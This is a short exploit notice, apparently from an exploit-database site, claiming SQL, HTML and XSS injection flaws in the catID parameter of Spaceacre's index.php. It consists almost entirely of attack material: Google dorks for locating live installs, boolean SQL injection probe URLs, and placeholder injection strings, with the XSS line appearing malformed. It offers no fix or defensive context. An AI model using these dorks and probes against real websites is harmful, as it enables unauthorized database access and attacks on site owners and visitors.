------------------------------------------------------------------------------------------- Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability ------------------------------------------------------------------------------------------- Author: CoBRa_21 Script Home: http://www.spaceacre.com Dork 1: inurl:cat1.php?catID= "Spaceacre" Dork 2: intext:"Designed by Spaceacre" ------------------------------------------------------------------------------------------- SQL Injection: http://localhost/[path]/index.php?catID=1 and 1=2 http://localhost/[path]/index.php?catID=1 and 1=1 ------------------------------------------------------------------------------------------- HTML Injection: http://localhost/[path]/index.php?catID=CoBRa_21 HTML İNJ. ------------------------------------------------------------------------------------------- XSS Injection: http://localhost/[path]/index.php?catID=index.php?catID= XSS İNJ. -------------------------------------------------------------------------------------------